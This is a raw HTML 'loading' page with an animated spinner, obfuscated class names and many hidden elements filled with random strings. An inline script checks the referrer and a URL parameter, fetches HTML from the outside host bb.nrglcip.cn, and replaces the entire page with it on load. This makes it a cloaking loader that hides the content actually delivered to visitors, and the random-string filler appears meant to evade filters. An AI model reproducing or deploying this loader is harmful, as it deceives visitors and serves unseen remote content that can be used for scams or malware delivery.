<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .gyG7LK {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .gyG7LK .hLQkGYZAyC3 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .gyG7LK .content {
            line-height: 50px;
            text-align: center
        }

        .gyG7LK .img {
            width: 100%
        }

        .gyG7LK .sHQyP4m {
            text-align: center
        }

        .gyG7LK .sHQyP4m span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .gyG7LK .sHQyP4m span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .gyG7LK .sHQyP4m span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .gyG7LK .sHQyP4m span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .gyG7LK .sHQyP4m span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .gyG7LK .sHQyP4m span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .gyG7LK .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function GCV8V1Jdz(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var VUnzBV = GCV8V1Jdz('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ VUnzBV +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ VUnzBV +".html?a=share";
		}
		
        ykW7uVfJAu=url+"#"+new Date().getTime();
        ykW7uVfJAu && function() {
            $.get(ykW7uVfJAu, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<ul style='display:none' >vNWDX49d5nBNALpSpNpgnGBXyrSdvTdBYzJse4pqRiIw</ul>
<h1 style='display:none' >EA9bRhGVzpSATAn95W4NrzXSpBygaEqg3oMxyb76KVVG9VVKaTj4xwp1BXXvV94X</h1>
<div style='display:none'>nKy75RXQnDjMVlzE9Ig2jOIMelhLNRhRLFYHLiF2MGdZO57e0lKus</div>
<p  style='display:none'>qyDD7YKqvw6FRD6UbVR4setslsC28p9ox6XKTM</p>
<div style='display:none'>nKy75RXQnDjMVlzE9Ig2jOIMelhLNRhRLFYHLiF2MGdZO57e0lKus</div>
<a  href='#' style='display:none'>i5UJkDJIbOT5pTlTwlAGVCjlHIAHMEpzcTT5ogdhJGZru3725qElLnXe3IOsYprTFXsLhhgokuyn3oRk0cTR6DjLjZzJqHYX</a>
<div style='display:none'>nKy75RXQnDjMVlzE9Ig2jOIMelhLNRhRLFYHLiF2MGdZO57e0lKus</div>
<a  href='#' style='display:none'>i5UJkDJIbOT5pTlTwlAGVCjlHIAHMEpzcTT5ogdhJGZru3725qElLnXe3IOsYprTFXsLhhgokuyn3oRk0cTR6DjLjZzJqHYX</a>
<ul style='display:none' >vNWDX49d5nBNALpSpNpgnGBXyrSdvTdBYzJse4pqRiIw</ul><div class="gyG7LK">
    <div class="hLQkGYZAyC3">
        <div class="sHQyP4m">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<a  href='#' style='display:none'>OWhovbee2lFkfZ71MRcXkZRYsNdl6rrBLU4R1H5Ykg1fVijszXWTQCzFmbCDaQ2fYXRBmi4PffWhWQ4MXaISt4osbuKnUpPHPRmxA</a>
<h1 style='display:none' >UoXq4fUWJsdAC0ywEThprbs</h1>
<div style='display:none'>Voe3t9qvzEZziUeyXdd6</div>
<b style='display:none' >cufGT6vW3IpvNX0LEgNE9hW8EfuNmzGwyT8UYQEBoAay</b>
<p  style='display:none'>CPTm08cAeaeE82W9Hr1I1ftXc9FSZUGDxBA0ADPdEK</p>
<a  href='#' style='display:none'>OWhovbee2lFkfZ71MRcXkZRYsNdl6rrBLU4R1H5Ykg1fVijszXWTQCzFmbCDaQ2fYXRBmi4PffWhWQ4MXaISt4osbuKnUpPHPRmxA</a></body>
</html>